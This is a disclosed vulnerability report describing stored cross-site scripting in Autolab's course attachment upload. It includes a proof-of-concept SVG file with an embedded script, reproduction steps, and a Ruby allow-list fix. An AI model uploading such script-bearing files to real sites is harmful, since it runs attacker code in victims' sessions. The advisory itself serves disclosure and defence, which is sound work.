Cross-site Scripting (XSS) - Stored

Published: 2022-03-02 14:30:50
Reporter: abhiabhi2306
Source: www.huntr.dev
Tags: cross-site scripting, autolab, stored, file upload, xss attack, impact, mitigation, file type checking, white-list approach, bug bounty

EPSS: 0.001
Percentile: 21.4%

Description

Autolab is vulnerable to stored cross-site scripting in the file upload functionality of the courses feature. An uploaded SVG attachment carrying a script is rendered inline, so it can be used to execute an XSS attack against any victim who views it, whether student or teacher.

Steps to Reproduce (PoC)

  1. Log in to Autolab.
  2. Go to https://DOMAIN/courses/COURSENAME/attachments/new
  3. Upload the file below as something.svg:

     <?xml version="1.0" standalone="no"?>
     <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

     <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
        <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
        <script type="text/javascript">
           alert("xssed");
        </script>
     </svg>

  4. Go to https://DOMAIN/courses/COURSENAME/attachments
  5. View the file you just uploaded; the alert function executes in your browser.

Impact

This can be used to perform XSS attacks on other users: students and teachers can also view attachments, so the stored payload runs in their browsers. Such XSS can be weaponized to trick victims into unwanted actions by executing attacker-controlled JavaScript in their session.

Proof

https://prnt.sc/LGy-cYXA37sK

Fix / Mitigation

Check file types at upload time and allow only the expected types. A server-side white-list (allow-list) approach is recommended: determine the file type on the server and accept or reject the file during upload based on that list, rather than trusting the client-supplied name or content type.
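The following is an added example of the server-side allow-list check described above; it is not Autolab's own code. Autolab is a Rails application, so it is written in Ruby. The allow-list contents, the method names and the sample SVG bytes are assumptions; the check requires both an allowed extension and matching leading bytes, so a renamed SVG (an XML document that can carry a script, like the PoC above) is rejected even when uploaded as "image.png".

```ruby
# Added example (not Autolab's code): allow-list validation for course
# attachments. A file is accepted only when its extension is on the allow-list
# AND its leading bytes match that type's signature. Text-based formats such as
# SVG are deliberately absent because they can carry <script> content.
ALLOWED_TYPES = {
  'pdf'  => ["%PDF-".b],
  'png'  => ["\x89PNG\r\n\x1a\n".b],
  'jpg'  => ["\xFF\xD8\xFF".b],
  'jpeg' => ["\xFF\xD8\xFF".b],
  'zip'  => ["PK\x03\x04".b],
}.freeze

class UploadRejected < StandardError; end

# Returns the normalized extension when the upload is acceptable, otherwise
# raises UploadRejected with the reason (useful for an error shown to the user).
def validate_attachment(filename, bytes)
  ext = File.extname(filename.to_s).delete_prefix('.').downcase
  sigs = ALLOWED_TYPES[ext]
  raise UploadRejected, "extension '#{ext}' is not on the allow-list" if sigs.nil?

  # Compare raw bytes, independent of any declared text encoding.
  head = bytes.to_s.b[0, 16]
  unless sigs.any? { |sig| head.start_with?(sig) }
    raise UploadRejected, "content does not match a #{ext} file signature"
  end
  ext
end

# Boolean wrapper for use in a controller or model validation.
def attachment_allowed?(filename, bytes)
  validate_attachment(filename, bytes)
  true
rescue UploadRejected
  false
end

# Constructed sample: the opening bytes of an SVG like the one in the PoC.
SAMPLE_SVG = "<?xml version=\"1.0\" standalone=\"no\"?><svg></svg>"

if __FILE__ == $PROGRAM_NAME
  puts attachment_allowed?('something.svg', SAMPLE_SVG)  # false: svg not allowed
  puts attachment_allowed?('something.png', SAMPLE_SVG)  # false: signature mismatch
end
```

If SVG attachments must be supported, serve them with Content-Disposition: attachment and X-Content-Type-Options: nosniff rather than rendering them inline, so an embedded script cannot run in the application's origin.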


